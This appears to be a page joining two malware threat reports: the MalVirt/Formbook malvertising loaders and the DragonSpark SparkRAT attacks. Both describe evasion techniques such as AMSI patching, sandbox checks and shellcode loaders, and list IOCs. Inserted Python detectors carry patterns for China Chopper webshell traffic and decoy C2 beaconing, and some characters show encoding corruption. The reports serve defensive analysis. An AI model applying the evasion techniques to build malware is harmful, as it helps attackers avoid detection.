Among the payloads that MalVirt loaders distribute, we spotted infostealer malware of the Formbook family as part of an ongoing campaign at the time of writing. The distribution of this malware through the MalVirt loaders is characterized by an unusual amount of applied anti-analysis and anti-detection techniques.

The current spikes in threat actors using malware distribution methods alternative to Office macros, such as malvertising, Windows Shortcuts (LNK files), and ISO files, come as a response to Microsoft blocking Office macros by default in documents from the Internet. Malvertising is a malware delivery method that is currently very popular among threat actors, marked by a significant increase in malicious search engine advertisements in recent weeks.

The Formbook family โ€“ Formbook and its newer version XLoader โ€“ is a feature-rich infostealer malware that implements a wide range of functionalities, such as keylogging, screenshot theft, theft of web and other credentials, and staging of additional malware. For example, one of the hallmarks of XLoader is its intricate disguising of C2 traffic.

This malware is sold on the dark web and is traditionally delivered as an attachment to phishing emails. While it is typically used by threat actors with cybercrime motivations, its use has also been recently observed as part of attacks with potentially political motivations โ€“ in September 2022, Ukraineโ€™s CERT reported a Formbook/XLoader campaign targeting Ukrainian state organizations through war-themed phishing emails. In the case of an intricate loader, this could suggest an attempt to co-opt cybercriminal distribution methods to load more targeted second-stage malware onto specific victims after initial validation.

We focus on the MalVirt loaders and the infostealer malware subsequently distributed by them in order to highlight the effort the threat actors have invested in evading detection and thwarting analysis.

The MalVirt Loaders

We first spotted a MalVirt sample when performing a routine Google search for โ€œBlender 3Dโ€ and examining the Ad results.

Malicious advertisements (โ€œBlender 3Dโ€ Google search)

The MalVirt samples we analyzed have the PDB path

C:\Users\Administrator\source\repos\DVS-Calculator-Windows-App-main\Calculator\obj\x86\Debug\Calculator.pdb

They can be further characterized by obfuscated namespace, class, and function names composed of alphanumeric characters, such as Birthd1y or Tota2, in the same manner as previously observed Formbook loaders.

MalVirt namespace, class, and function names

The loaders pretend to be digitally signed using signatures and countersignatures from companies such as Microsoft, Acer, DigiCert, Sectigo, and AVG Technologies USA. However, in each case the signatures are invalid, created with invalid certificates or with certificates untrusted by the system (i.e., not stored in the Trusted Root Certification Authorities certificate store). For example, the following certificate appears to be from Microsoft but doesnโ€™t pass signature validation.

  • Name: Microsoft Corporation
  • Thumbprint: 8c2136e83f9526d3c44c0bb0bccc6cf242702b16
  • Serial Number: 00b6bce5a3c0e0111b78adf33d9fdc3793
A digital signature of a MalVirt sample

The MalVirt loaders we analyzed, especially those distributing malware of the Formbook family, implement a range of anti-analysis and anti-detection techniques, with some variations across MalVirt samples. For example, some samples patch the AmsiScanBuffer function implemented in amsi.dll to bypass the Anti Malware Scan Interface (AMSI) that detects malicious PowerShell commands.

Further, in an attempt to evade static detection mechanisms, some strings (such as amsi.dll and AmsiScanBuffer) are Base64-encoded and AES-encrypted. The MalVirt loaders decode and decrypt such strings using hardcoded, Base64-encoded AES encryption keys.

String decryption

We also observed MalVirt samples evaluating whether they are executing within a virtual machine or an application sandbox environment. For example, detecting the VirtualBox and VMWare environments involves querying the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\VirtualBox Guest and HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools, and evaluating the presence of the drivers vboxmouse.sys, vmmouse.sys, and vmhgfs.sys on victim systems.

Detecting the Wine and Sandboxie application sandbox environments involves evaluating the presence of the wine_get_unix_file_name function in the kernel32.dll Windows library and the SbieDll.dll Sandboxie library on victim systems.

Detection of virtual machine and application sandbox environments

Process Explorer Driver

We observed MalVirt samples deploying and loading the Process Explorer driver, part of the Windows Sysinternals toolset. This includes a sample (SHA-1: 15DB79699DCEF4EB5D731108AAD6F97B2DC0EC9C) that distributes malware of the Formbook family as part of an active campaign at the time of writing. An assembly named 0onfirm, which this sample reflectively loads, deploys the Process Explorer driver in the %LOCALAPPDATA%\Temp directory under the name ะ˜ะธััƒั.sys. The driver has a valid digital signature issued by Microsoft using an expired certificate (validity period between 15 December 2020 and 12 December 2021).

0onfirm then deploys the driver by creating a service named TaskKill. The assembly creates the ImagePath, Start, Type, and ErrorControl registry values at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TaskKill to deploy the driver and configure its loading at system start-up. The name TaskKill indicates the potential malicious use of ะ˜ะธััƒั.sys โ€“ process termination with kernel privileges.

0onfirm deploys and loads ะ˜ะธััƒั.sys
ะ˜ะธััƒั.sys loaded at system start-up a DriverView output
ะ˜ะธััƒั.sys loaded at system start-up (a DriverView output)

Malware in general uses the Process Explorer driver to conduct activities with kernel privileges, such as killing processes of detection mechanisms to evade detection or duplicating process handles for tampering. For example, in late 2022, the use of the ะ˜ะธััƒั.sys driver was observed as part of the deployment (potentially also through a MalVirt loader) of a different payload โ€“ Agent Tesla. The open-source tool Backstab also demonstrates the malicious use of the Process Explorer driver.
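The driver described above carries a genuine Microsoft signature, so a signature check alone does not separate it from a benign Sysinternals deployment; what stands out is where the TaskKill service points and what the file is called. The following added example (not code from the post) reviews kernel-driver service definitions of the kind 0onfirm writes under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and flags drivers whose ImagePath lies outside the Windows directory, sits in a user-writable location such as %LOCALAPPDATA%\Temp, or has a non-ASCII file name. The Type value 1 (SERVICE_KERNEL_DRIVER) is a Windows constant; the dictionary form of the registry values, the user name, and the concrete paths are constructed to mirror the post's description.

```python
"""Flag kernel-driver services whose image lives outside the Windows directory.

Added analyst example, not code from the post. SAMPLE_SERVICES is a constructed
view of HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name> values, mirroring the
TaskKill service the post describes; the user name and paths are made up.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

SERVICE_KERNEL_DRIVER = 1  # Windows 'Type' value for kernel-mode drivers

SAMPLE_SERVICES: Dict[str, Dict[str, object]] = {
    "disk": {"Type": 1, "Start": 0, "ErrorControl": 1,
             "ImagePath": "\\SystemRoot\\System32\\drivers\\disk.sys"},
    "TaskKill": {"Type": 1, "Start": 2, "ErrorControl": 1,  # constructed entry
                 "ImagePath": "\\??\\C:\\Users\\victim\\AppData\\Local\\Temp\\ะ˜ะธััƒั.sys"},
    "Spooler": {"Type": 16, "Start": 2, "ErrorControl": 1,  # user-mode service, skipped
                "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
}

# Prefixes under which shipped drivers normally live (baseline assumption).
WINDOWS_DIR_PREFIXES = ("\\systemroot\\", "c:\\windows\\", "%systemroot%\\", "system32\\")
# Locations a standard user can write to.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\local\\temp\\|\\temp\\|\\programdata\\", re.IGNORECASE)


@dataclass
class DriverFinding:
    service: str
    image_path: str
    reasons: List[str] = field(default_factory=list)


def normalize_image_path(raw: object) -> str:
    """Strip quotes and the NT object-manager prefix so prefix checks are uniform."""
    path = str(raw).strip().strip('"')
    if path.lower().startswith("\\??\\"):
        path = path[4:]
    return path


def triage_driver_services(services: Dict[str, Dict[str, object]]) -> List[DriverFinding]:
    """Return one finding per kernel-driver service that breaks the location baseline."""
    findings: List[DriverFinding] = []
    for name, values in services.items():
        if values.get("Type") != SERVICE_KERNEL_DRIVER:
            continue
        path = normalize_image_path(values.get("ImagePath", ""))
        reasons: List[str] = []
        if not path.lower().startswith(WINDOWS_DIR_PREFIXES):
            reasons.append("driver image outside the Windows directory")
        if USER_WRITABLE.search(path):
            reasons.append("driver image in a user-writable location")
        if not path.isascii():
            reasons.append("non-ASCII characters in driver file name")
        if reasons:
            findings.append(DriverFinding(name, path, reasons))
    return findings


if __name__ == "__main__":
    for finding in triage_driver_services(SAMPLE_SERVICES):
        print(finding.service, finding.image_path, "->", "; ".join(finding.reasons))
```

On a live host the same dictionary can be populated from the registry with Python's winreg module or from a .reg export; the Start value 2 (auto-start) that the post describes is what makes the driver reload at boot, so a finding should also prompt a look at who created the service key.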

Obfuscated .NET Virtualization

A hallmark of the MalVirt loaders is the use of .NET virtualization as an anti-analysis and anti-detection technique. When executed, a MalVirt sample reflectively loads an assembly, such as 0onfirm, which further orchestrates the staging of the final payload. These assemblies are virtualized using the KoiVM virtualizing protector of .NET applications, modified with additional obfuscation techniques. Code virtualization on its own is among the most advanced methods for obfuscating executables at this time.

A KoiVM-virtualized MalVirt assembly

Virtualization frameworks such as KoiVM obfuscate executables by replacing the original code, such as .NET Common Intermediate Language (CIL) instructions, with virtualized code that only the virtualization framework understands. A virtual machine engine executes the virtualized code by translating it into the original code at runtime. When put to malicious use, virtualization makes malware analysis challenging and also represents an attempt to evade static analysis mechanisms.

Tools for the automated de-virtualization of virtualized executables using KoiVM, such as OldRod, can be very effective when facing the standard implementation of KoiVM. OldRod recompiles virtualized code into .NET CIL code in an attempt to recover the original code.

The current standard implementation of KoiVM defines 119 constant variables that the framework uses to virtualize code constructs. These constructs include, for example, flag and instruction opcode definitions. The variables are grouped and ordered according to the constructs they virtualize.

When initialized, KoiVM assigns values to these variables in a designated routine. This is a crucial component of the KoiVM virtualization process. Automated de-virtualization involves detecting this routine by searching for assignment instructions, and using the assigned values to recompile the virtualized code to its native form. However, MalVirt makes automated de-virtualization challenging by using a modified version of the standard KoiVM implementation with obfuscation techniques.

KoiVM constant variables

The designated KoiVM routine is obfuscated such that it conducts arithmetic operations instead of concise assignments. This is to confuse devirtualization frameworks, such as OldRod, attempting to detect the routine and extract the variable values crucial for accurate de-virtualization.

Obfuscated value assignments

To defeat this obfuscation technique, the values that the modified implementation of KoiVM assigns to the constant variables can be extracted from the memory of the virtualized MalVirt assembly while it executes. The routine can then be patched such that it assigns the appropriate value to each constant variable using concise assignments. This helps a de-virtualization framework to detect the routine and extract the values.

Values of constant variables in the memory of a virtualized MalVirt assembly
Patched value assignment routine

However, the modified implementation of KoiVM used by MalVirt adds yet another layer of obfuscation โ€“ it distorts the original order of the constant variables defined by the standard KoiVM implementation. This confuses de-virtualization frameworks and may lead to incorrect de-virtualization.

Restoring the original order can be a very challenging and time-consuming task. This involves the manual inference of the constructs that each of the 119 variables is used for based on code analysis. Alternatively, one could develop logic to automate this activity, which may prove to be an equally challenging endeavor.

Infostealer Campaign

The infostealer malware samples that the MalVirt loaders distribute are part of a campaign that is ongoing at the time of writing. A campaign is marked by an identifier that is present in the HTTP POST and GET requests issued by the malware.

The gwmr campaign identifier

Formbook and XLoader have traditionally been distributed via phishing emails and malspam carrying macro-enabled Office documents. Our observation of Formbook-family malware being distributed through MalVirt loaders suggests that Formbook and/or XLoader are likely being (or will be) distributed via malvertising as well. This follows the broader trend of crimeware actors quickly shifting to Google malvertising.

In addition to the MalVirt loaders, Formbook and XLoader themselves implement considerable protection against analysis and detection, at both the executable and network level.

Formbook and XLoader disguise real C2 traffic among smokescreen HTTP requests with encoded and encrypted content to multiple domains, randomly selected from an embedded list. Only one of the domains is the real C2 server and the rest are decoys. A sample we analyzed issued HTTP GET and/or POST requests with encoded and encrypted HTTP data to 17 domains (16 endpoints) listed in the IOC table below. Previous research provides detailed information on how XLoader in particular implements this technique.

The technique of camouflaging the true C2 domain by beaconing to multiple domains remains consistent with the previously noted research. The malware beacons to a mix of legitimate and unused registered domains. As the following snapshot of some of the domains the malware contacts shows, there is wide variety in domain types, hosting providers, and registration dates.

Example variety of domains

The domains are hosted by a range of providers, including Choopa, Namecheap, and multiple others. The random approach to domain selection is beyond the scope of this report; however, it remains a highly effective way of concealing true C2s. XLoader's recent infrastructure-concealing techniques in particular should serve as an example of how crimeware can be even more technically sophisticated than many of today's APTs.
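Added detection example (not from this report or the cited research) for the decoy-domain behaviour just described: it runs over constructed endpoint telemetry, with hypothetical process names and .example hosts, and flags any process that contacts an unusually large set of distinct hosts within a short window, which is what a single sample beaconing to 17 domains looks like from the host.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed endpoint telemetry (hypothetical PIDs, images and .example hosts).
# One process sprays GET/POST beacons at a dozen unrelated hosts within a
# minute, as the decoy C2 traffic described above does; a browser behaves normally.
_BEACONS = [(1, "POST", 412), (4, "GET", 0), (7, "POST", 398), (11, "POST", 405),
            (14, "GET", 0), (18, "POST", 410), (22, "POST", 401), (26, "GET", 0),
            (29, "POST", 415), (33, "POST", 399), (37, "POST", 408), (41, "GET", 0)]
SAMPLE_TELEMETRY = [
    f"2023-01-10T12:00:{sec:02d}Z pid=4120 image=explorer.exe {method} www.decoy-{i:02d}.example {size}"
    for i, (sec, method, size) in enumerate(_BEACONS)
] + [
    "2023-01-10T12:00:02Z pid=2210 image=firefox.exe GET www.news.example 0",
    "2023-01-10T12:00:05Z pid=2210 image=firefox.exe POST www.news.example 2048",
    "2023-01-10T12:00:09Z pid=2210 image=firefox.exe GET static.news.example 0",
]

Event = Tuple[datetime, str]  # (timestamp, host)


def parse_line(line: str) -> Tuple[int, str, Event]:
    """Split one telemetry line into (pid, image, (timestamp, host))."""
    ts, pid, image, _method, host, _size = line.split()
    return (int(pid.split("=", 1)[1]), image.split("=", 1)[1],
            (datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host))


def max_distinct_hosts(events: List[Event], window_s: int = 60) -> int:
    """Largest number of distinct hosts seen inside any window_s-second window."""
    events = sorted(events)
    best = start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > timedelta(seconds=window_s):
            start += 1
        best = max(best, len({host for _, host in events[start:end + 1]}))
    return best


def find_decoy_beaconing(lines: List[str], threshold: int = 8,
                         window_s: int = 60) -> Dict[int, Tuple[str, int]]:
    """Return {pid: (image, distinct_hosts)} for processes whose host fan-out
    within the window reaches the threshold. A threshold of 8 is a starting
    point to tune against a baseline of normal processes, not a fixed rule."""
    per_pid: Dict[int, List[Event]] = defaultdict(list)
    images: Dict[int, str] = {}
    for line in lines:
        pid, image, event = parse_line(line)
        per_pid[pid].append(event)
        images[pid] = image
    flagged: Dict[int, Tuple[str, int]] = {}
    for pid, events in per_pid.items():
        count = max_distinct_hosts(events, window_s)
        if count >= threshold:
            flagged[pid] = (images[pid], count)
    return flagged


if __name__ == "__main__":
    for pid, (image, count) in find_decoy_beaconing(SAMPLE_TELEMETRY).items():
        print(f"pid {pid} ({image}) contacted {count} distinct hosts within 60s")
```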

At the executable level, among other anti-analysis techniques, the malware detects the presence of user- and kernel-land debuggers using the NtQueryInformationProcess and NtQuerySystemInformation functions with the ProcessDebugPort (0x7) and SystemKernelDebuggerInformation (0x23) information classes. Previous research provides a detailed overview of the implemented anti-analysis and anti-detection techniques.

Debugger detection

Conclusions

In response to Microsoft blocking Office macros by default in documents from the Internet, threat actors have turned to alternative malware distribution methods, most recently malvertising. The MalVirt loaders we observed demonstrate just how much effort threat actors are investing in evading detection and thwarting analysis.

Malware of the Formbook family is a highly capable infostealer, and the MalVirt loaders deploy it behind a significant amount of anti-analysis and anti-detection techniques. This malware has traditionally been distributed as an attachment to phishing emails; we assess that the threat actors distributing it are likely joining the malvertising trend.

Given the massive size of the audience threat actors can reach through malvertising, we expect malware to continue being distributed using this method.

Indicators Of Compromise

Type Value Note
SHA1 15DB79699DCEF4EB5D731108AAD6F97B2DC0EC9C MalVirt loader sample
SHA1 655D0B6F6570B5E07834AA2DD8211845B4B59200 0onfirm .NET assembly
SHA1 BC47E15537FA7C32DFEFD23168D7E1741F8477ED Process Explorer driver
SHA1 51582417D24EA3FEEBF441B8047E61CBE1BA2BF4 Infostealer malware payload
Domain www.togsfortoads[.]com Contacted domain as part of C2 disguise traffic
Domain www.popimart[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.kajainterior[.]com Contacted domain as part of C2 disguise traffic
Domain www.heji88.hj-88[.]com Contacted domain as part of C2 disguise traffic
Domain www.headzees[.]com Contacted domain as part of C2 disguise traffic
Domain www.in-snoqualmievalley[.]com Contacted domain as part of C2 disguise traffic
Domain www.365heji[.]com Contacted domain as part of C2 disguise traffic
Domain www.h3lpr3[.]store Contacted domain as part of C2 disguise traffic
Domain www.graciesvoice[.]info Contacted domain as part of C2 disguise traffic
Domain www.femfirst.co[.]uk Contacted domain as part of C2 disguise traffic
Domain www.cistonewhobeliev[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.allspaceinfo[.]com Contacted domain as part of C2 disguise traffic
Domain www.baldur-power[.]com Contacted domain as part of C2 disguise traffic
Domain www.ohotechnologies[.]com Contacted domain as part of C2 disguise traffic
Domain www.carlosaranguiz[.]dev Contacted domain as part of C2 disguise traffic
Domain www.iidethakur[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.huifeng-tech[.]com Contacted domain as part of C2 disguise traffic

DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation

24 January 2023 at 10:55

By Aleksandar Milenkoski, Joey Chen, and Amitai Ben Shushan Ehrlich

Executive Summary

  • SentinelLabs tracks a cluster of recent opportunistic attacks against organizations in East Asia as DragonSpark.
  • SentinelLabs assesses it is highly likely that a Chinese-speaking actor is behind the DragonSpark attacks.
  • The attacks provide evidence that Chinese-speaking threat actors are adopting the little-known open source tool SparkRAT.
  • The threat actors use Golang malware that implements an uncommon technique for hindering static analysis and evading detection: Golang source code interpretation.
  • The DragonSpark attacks leverage compromised infrastructure located in China and Taiwan to stage SparkRAT along with other tools and malware.

Overview

SentinelLabs has been monitoring recent attacks against East Asian organizations that we track as 'DragonSpark'. The attacks are characterized by the use of the little-known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.

The DragonSpark attacks represent the first concrete malicious activity where we observe the consistent use of the open source SparkRAT, a relatively new occurrence on the threat landscape. SparkRAT is multi-platform, feature-rich, and frequently updated with new features, making the RAT attractive to threat actors.

The Microsoft Security Threat Intelligence team reported in late December 2022 on indications of threat actors using SparkRAT. However, we have not observed concrete evidence linking DragonSpark to the activity documented in the report by Microsoft.

We observed that the threat actor behind the DragonSpark attacks uses Golang malware that interprets embedded Golang source code at runtime as a technique for hindering static analysis and evading detection by static analysis mechanisms. This uncommon technique provides threat actors with yet another means to evade detection mechanisms by obfuscating malware implementations.

Intrusion Vector

We observed compromises of web servers and MySQL database servers exposed to the Internet as the initial indicators of the DragonSpark attacks. Exposing MySQL servers to the Internet is an infrastructure posture flaw that often leads to severe incidents involving data breaches, credential theft, or lateral movement across networks. On compromised web servers, we observed use of the China Chopper webshell, recognizable by the &echo [S]&cd&echo [E] sequence in virtual terminal requests. China Chopper is commonly used by Chinese threat actors, which are known to deploy the webshell through different vectors, such as exploiting web server vulnerabilities, cross-site scripting, or SQL injection.

After gaining access to environments, the threat actor conducted a variety of malicious activities, such as lateral movement, privilege escalation, and deployment of malware and tools hosted at attacker-controlled infrastructure. We observed that the threat actor relies heavily on open source tools that are developed by Chinese-speaking developers or Chinese vendors. This includes SparkRAT as well as other tools, such as:

  • SharpToken: a privilege escalation tool that enables the execution of Windows commands with SYSTEM privileges. The tool can also enumerate user and process information, and add, delete, or change the passwords of system users.
  • BadPotato: a tool similar to SharpToken that elevates user privileges to SYSTEM for command execution. The tool has been observed in an attack campaign conducted by a Chinese threat actor with the goal of acquiring intelligence.
  • GotoHTTP: a cross-platform remote access tool that implements a wide array of features, such as establishing persistence, file transfer, and screen view.

In addition to the tools above, the threat actor used two custom-built malware samples for executing malicious code: ShellCode_Loader, implemented in Python and delivered as a PyInstaller package, and m6699.exe, implemented in Golang.

SparkRAT

SparkRAT is a RAT developed in Golang and released as open source software by the Chinese-speaking developer XZB-1248. SparkRAT is a feature-rich and multi-platform tool that supports the Windows, Linux, and macOS operating systems.

SparkRAT uses the WebSocket protocol to communicate with the C2 server and features an upgrade system. This enables the RAT to automatically upgrade itself to the latest version available on the C2 server upon startup by issuing an upgrade request. This is an HTTP POST request, with the commit query parameter storing the current version of the tool.

A SparkRAT upgrade request

In the attacks we observed, the version of SparkRAT was 6920f726d74efb7836a03d3acfc0f23af196765e, built on 1 November 2022 UTC. This version supports 26 commands that implement a wide range of functionalities:

  • Command execution: including execution of arbitrary Windows system and PowerShell commands.
  • System manipulation: including system shutdown, restart, hibernation, and suspension.
  • File and process manipulation: including process termination as well as file upload, download, and deletion.
  • Information theft: including exfiltration of platform information (CPU, network, memory, disk, and system uptime information), screenshot theft, and process and file enumeration.

SparkRAT version
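Added detection example, not from the report, covering the two request-level indicators given above: the China Chopper terminal sequence from the Intrusion Vector section and the SparkRAT upgrade POST carrying a commit query parameter. It runs over constructed web-server request records with hypothetical source addresses and paths; the only page value used is the SparkRAT version hash. The URL-decoding step matters because the webshell body usually arrives percent-encoded.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

# China Chopper virtual-terminal sequence quoted in the text. It is normally
# sent percent-encoded inside the POST body, so the body is decoded first.
CHOPPER_MARKER = "&echo [S]&cd&echo [E]"

# SparkRAT's upgrade request is an HTTP POST whose 'commit' query parameter
# holds the client's version, a 40-hex git commit as in the version above.
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")

# Constructed request records (hypothetical sources and paths). The commit
# value is the SparkRAT build referenced in the text.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"src": "198.51.100.7", "method": "POST", "url": "/uploads/img.aspx",
     "body": "z=%26echo+%5BS%5D%26cd%26echo+%5BE%5D"},
    {"src": "198.51.100.9", "method": "POST",
     "url": "/api/client/update?commit=6920f726d74efb7836a03d3acfc0f23af196765e",
     "body": ""},
    {"src": "203.0.113.5", "method": "GET", "url": "/index.html", "body": ""},
    # Benign: a 'commit' parameter that is not a commit hash, and a plain 'echo'.
    {"src": "203.0.113.6", "method": "POST", "url": "/search?commit=latest",
     "body": "q=echo+hello"},
]


def classify_request(req: Dict[str, str]) -> List[str]:
    """Return the indicator names that match one request (empty if none)."""
    hits: List[str] = []
    if CHOPPER_MARKER in unquote_plus(req.get("body", "")):
        hits.append("china_chopper_terminal")
    query = parse_qs(urlsplit(req["url"]).query)
    if req["method"] == "POST" and any(COMMIT_RE.match(v) for v in query.get("commit", [])):
        hits.append("sparkrat_upgrade_request")
    return hits


def scan_requests(requests: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Pair each matching source address with the indicator it triggered."""
    return [(req["src"], hit) for req in requests for hit in classify_request(req)]


if __name__ == "__main__":
    for src, hit in scan_requests(SAMPLE_REQUESTS):
        print(f"{src}: {hit}")
```

The commit check alone is a weak signal on its own; pairing it with an unexpected destination or an unsigned client binary is what makes it actionable.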

Golang Source Code Interpretation For Evading Detection

The Golang malware m6699.exe uses the Yaegi framework to interpret at runtime encoded Golang source code stored within the compiled binary, executing the code as if compiled. This is a technique for hindering static analysis and evading detection by static analysis mechanisms.

The main purpose of m6699.exe is to execute a first-stage shellcode that implements a loader for a second-stage shellcode.

m6699.exe first decodes a Base64-encoded string. This string is Golang source code that conducts the following activities:

  • Declares a Main function as part of a package named run. The run.Main function takes as a parameter a byte array: the first-stage shellcode.
  • The run.Main function invokes the HeapCreate function to allocate executable and growable heap memory (HEAP_CREATE_ENABLE_EXECUTE).
  • The run.Main function places the first-stage shellcode, supplied to it as a parameter when invoked, in the allocated memory and executes it.

Golang source code in m6699.exe

m6699.exe then evaluates the source code in the context of the Yaegi interpreter and uses Golang reflection to execute the run.Main function. m6699.exe passes as a parameter to run.Main the first-stage shellcode, which the function executes as previously described. m6699.exe stores the shellcode as a double Base64-encoded string, which the malware decodes before passing to run.Main for execution.

The first-stage shellcode that run.Main executes in double Base64-encoded and decoded form
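Added static-triage example (not the report's or the sample's code) for the layering described above: it scans a constructed stand-in binary for long Base64 runs, peels nested encodings, and reports blobs that decode to Go source with the package and function names and the executable-heap API mentioned in the text. The embedded stand-in source and the marker list are assumptions, not m6699.exe's actual contents.

```python
import base64
import re
from typing import Dict, List, Tuple

# Long runs of Base64 alphabet are candidate embedded blobs.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Markers taken from the description of m6699.exe: Go source declaring Main in
# a package named run, and executable heap allocation via HeapCreate.
GO_SOURCE_MARKERS = (b"package run", b"func Main(")
EXEC_MEMORY_MARKERS = (b"HeapCreate", b"HEAP_CREATE_ENABLE_EXECUTE")

# Constructed, inert stand-in for the interpreted source (hypothetical; it only
# carries the markers and does not allocate or execute anything).
_STAND_IN_GO_SOURCE = b"""package run

// Main would receive the first-stage shellcode and place it in memory
// obtained from HeapCreate with HEAP_CREATE_ENABLE_EXECUTE.
func Main(shellcode []byte) {}
"""

# Fake binary image: padding, the single-encoded Go source, then a
# double-encoded opaque payload, mirroring the two encoding depths above.
FAKE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 32
    + base64.b64encode(_STAND_IN_GO_SOURCE)
    + b"\x00" * 8
    + base64.b64encode(base64.b64encode(b"\xfc\x48\x83\xe4\xf0" * 20))
    + b"\x00" * 8
)


def decode_layers(blob: bytes, max_depth: int = 3) -> Tuple[bytes, int]:
    """Strip up to max_depth nested Base64 layers; return (payload, layers)."""
    depth = 0
    while depth < max_depth and B64_RUN.fullmatch(blob):
        try:
            blob = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error: not real Base64 after all
            break
        depth += 1
    return blob, depth


def scan_for_embedded_go(binary: bytes) -> List[Dict[str, object]]:
    """Report every decodable blob with its offset, encoding depth, whether it
    looks like Go source in the described shape, and whether it names the
    executable-memory API."""
    findings: List[Dict[str, object]] = []
    for match in B64_RUN.finditer(binary):
        payload, layers = decode_layers(match.group(0))
        if layers == 0:
            continue
        findings.append({
            "offset": match.start(),
            "layers": layers,
            "size": len(payload),
            "go_source": all(m in payload for m in GO_SOURCE_MARKERS),
            "exec_memory_api": any(m in payload for m in EXEC_MEMORY_MARKERS),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_for_embedded_go(FAKE_BINARY):
        print(finding)
```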

The first-stage shellcode implements a shellcode loader. It connects to a C2 server using the Windows Sockets 2 library and receives a 4-byte value: the size of a second-stage shellcode, for which the first-stage shellcode allocates memory of the received size. The first-stage shellcode then receives the second-stage shellcode from the C2 server and executes it.

When m6699.exe executes, the threat actor can establish a Meterpreter session for remote command execution.

A Meterpreter session with an m6699.exe instance (in a lab environment)

ShellCode_Loader

ShellCode_Loader is the internal name of a PyInstaller-packaged malware that is implemented in Python. ShellCode_Loader serves as the loader of a shellcode that implements a reverse shell.

ShellCode_Loader uses encoding and encryption to hinder static analysis. The malware first Base64-decodes and then decrypts the shellcode, using the AES-CBC algorithm with a Base64-encoded AES key and initialization vector.

ShellCode_Loader decodes and decrypts shellcode

ShellCode_Loader uses the Python ctypes library to access the Windows API, load the shellcode in memory, and start a new thread that executes the shellcode. The Python code that conducts these activities is Base64-encoded in an attempt to evade static analysis mechanisms that alert on the use of the Windows API for malicious purposes.

ShellCode_Loader executes shellcode

The shellcode creates a thread and connects to a C2 server using the Windows Sockets 2 library. When the shellcode executes, the threat actor can establish a Meterpreter session for remote command execution.

A Meterpreter session with a ShellCode_Loader instance (in a lab environment)

Infrastructure

The DragonSpark attacks leveraged infrastructure located in Taiwan, Hong Kong, China, and Singapore to stage SparkRAT and other tools and malware. The C2 servers were located in Hong Kong and the United States.

The malware staging infrastructure includes compromised infrastructure of legitimate Taiwanese organizations and businesses, such as a baby product retailer, an art gallery, and games and gambling websites. We also observed an Amazon Cloud EC2 instance as part of this infrastructure.

The tables below provide an overview of the infrastructure used in the DragonSpark attacks.

Malware staging infrastructure

IP address/Domain Country Notes
211.149.237[.]108 China A compromised server hosting web content related to gambling.
43.129.227[.]159 Hong Kong A Windows Server 2012 R2 instance with a computer name of 172_19_0_3. The threat actors may have obtained access to this server using a shared or bought account. We observed login credentials with the server's name being shared over different time periods in the Telegram channels King of VP$ and SellerVPS for sharing and/or selling access to virtual private servers.
www[.]bingoplanet[.]com[.]tw Taiwan A compromised server hosting web content related to gambling. The website resources have been removed at the time of writing. The domain has been co-hosted with several other websites of legitimate business, including travel agencies and an English preschool.
www[.]moongallery.com[.]tw Taiwan A compromised server hosting the website of the Taiwanese art gallery Moon Gallery.
www[.]holybaby.com[.]tw Taiwan A compromised server hosting the website of the Taiwanese baby product shop retailer Holy Baby.
13.213.41[.]125 Singapore An Amazon Cloud EC2 instance named EC2AMAZ-4559AU9.

C2 server infrastructure

IP address/Domain Country Notes
103.96.74[.]148 Hong Kong A Windows Server 2012 R2 instance with a computer name of CLOUD2012R2.
The threat actors may have obtained access to this server using a shared or bought account. We observed login credentials with the server's name being shared over different time periods in the Telegram channels Premium Acc, IRANHACKERS, and !Only For Voters for sharing and/or selling access to virtual private servers.
This set of infrastructure was observed resolving to jiance.ittoken[.]xyz at the time of writing. This specific domain can be linked to a wider set of Chinese phishing infrastructure over the past few years. It is unclear if they are related to this same actor.
104.233.163[.]190 United States A Windows Server 2012 R2 instance with a computer name of WIN-CLC0OFDKTMK.
The most recent passive DNS record related to this IP address points to a domain name with a Chinese TLD, kanmn[.]cn. However, this is shared hosting infrastructure through Aquanx and likely used by a variety of customers.
This IP address is known to have hosted a Cobalt Strike C2 server and been involved in other malicious activities, such as hosting known malware samples.

Attribution Analysis

We assess it is highly likely that a Chinese-speaking threat actor is behind the DragonSpark attacks. We are unable at this point to link DragonSpark to a specific threat actor due to lack of reliable actor-specific indicators.

The actor may have espionage or cybercrime motivations. In September 2022, a few weeks before we first spotted DragonSpark indicators, a sample of Zegost malware (bdf792c8250191bd2f5c167c8dbea5f7a63fa3b4), an info-stealer historically attributed to Chinese cybercriminals but also observed as part of espionage campaigns, was reported communicating with 104.233.163[.]190. We observed this same C2 IP address as part of the DragonSpark attacks. Previous research by the Weibu Intelligence Agency (微步情报局) reported that the Chinese cybercrime actor FinGhost was using Zegost, including a variant of the sample mentioned above.

In addition, the threat actor behind DragonSpark used the China Chopper webshell to deploy malware. China Chopper has historically been consistently used by Chinese cybercriminals and espionage groups, such as TG-3390 and Leviathan. Further, all of the open source tools used by the threat actor conducting the DragonSpark attacks are developed by Chinese-speaking developers or Chinese vendors. This includes SparkRAT by XZB-1248, SharpToken and BadPotato by BeichenDream, and GotoHTTP by Pingbo Inc.

